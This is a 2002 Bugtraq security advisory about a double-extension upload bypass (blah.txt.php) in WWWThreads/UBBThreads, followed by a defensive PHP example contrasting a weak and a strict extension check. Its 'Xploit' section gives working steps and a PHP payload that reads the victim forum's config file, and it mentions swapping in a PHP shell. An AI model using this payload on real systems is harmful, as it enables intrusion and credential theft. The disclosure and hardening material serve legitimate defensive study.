[24037] in bugtraq


[ WWWThreads, UBBThreads ] Security Hole in upload system

daemon@ATHENA.MIT.EDU (Root Extractor)
Wed Jan 30 18:05:17 2002

Date: 30 Jan 2002 22:12:17 -0000
Message-ID: <20020130221217.28688.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Root Extractor <condor@phreaker.net>
To: bugtraq@securityfocus.com



[ WWWThreads, UBBThreads ] Security Hole in upload system

Author: RootExtractor, CompuMe
condor@phreaker.net, compume2000@hotmail.com

I.   Details 
II.  Vulnerable versions
III. Example, Xploit
IV.  Solution

Details :

..: config.inc.php :..
------------------------- snip ------------------------------

// $config['excludefiles'] = ".php,.asp,.js,.vbs,.sht,.htm";
   $config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";

------------------------- snip ------------------------------

 
Files that were not listed in the allowed files could 
still be uploaded. It seems you checked the extension, 
but if someone added an allowable extension first, 
before the bogus extension, the file would upload.

vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and prior

not vulnerable : 
UBBThreads 5.5

Example : 
You allow the upload of .txt, .jpg, .bmp, .zip; 
all files that don't have those extensions should not 
be uploaded. 
However, if somebody changes the name of the file to 
blah.txt.php, the file will validate and upload......huh !

Xploit :
1) make a new file  $ touch blah.txt.php
2) edit it          $ vi blah.txt.php (in this step, write some PHP 
code, for example:)

	            <?php
	                $readfile = join("", file("../config.inc.php"));
	                print $readfile;
	            ?>

3) save & upload it
4) visit your blah file; now you can see the config file 
of the victim forum
5) I replaced the readfile code with a PHP shell file


Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/


Copyright 2002 recm security team
http://hop.to/condor
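The flaw the post describes (an allowed extension anywhere in the name satisfying the check) beside a check that only inspects the final extension, as an added example that is not code from the advisory or from the WWWThreads/UBBThreads code base. weak_is_allowed() is a guess at the kind of behaviour described, not the product's actual routine; $allowfiles reuses the list quoted in the advisory.

```php
<?php
// Added example: a guessed reconstruction of a substring-based extension
// check next to a hardened check that looks only at the final extension.
// Neither function is from the advisory or from UBBThreads itself.

$allowfiles = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";   // list quoted in the post

// Flawed (hypothetical): accept the upload if ANY allowed extension occurs
// anywhere in the name. "blah.txt.php" passes because ".txt" is a substring.
function weak_is_allowed(string $name, string $allowfiles): bool {
    foreach (explode(',', $allowfiles) as $ext) {
        if (stripos($name, $ext) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened: compare only the text after the LAST dot, case-insensitively,
// against the allow list; no extension or a trailing dot is rejected.
function strict_is_allowed(string $name, string $allowfiles): bool {
    $allowed = array_map(
        function ($e) { return strtolower(ltrim(trim($e), '.')); },
        explode(',', $allowfiles)
    );
    $base = basename($name);                  // drop any directory part
    $pos  = strrpos($base, '.');
    if ($pos === false || $pos === strlen($base) - 1) {
        return false;
    }
    $ext = strtolower(substr($base, $pos + 1));
    return in_array($ext, $allowed, true);
}

// Constructed sample names: the post's blah.txt.php plus a few edge cases.
$samples = ["photo.jpg", "blah.txt.php", "notes.TXT", "script.php", "README"];
foreach ($samples as $n) {
    printf("%-14s weak=%-3s strict=%s\n", $n,
        weak_is_allowed($n, $allowfiles)   ? 'yes' : 'no',
        strict_is_allowed($n, $allowfiles) ? 'yes' : 'no');
}
```

Even with a correct extension check, the upload directory should be served without script execution (or kept outside the web root), so that a misnamed file is only ever delivered as data.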
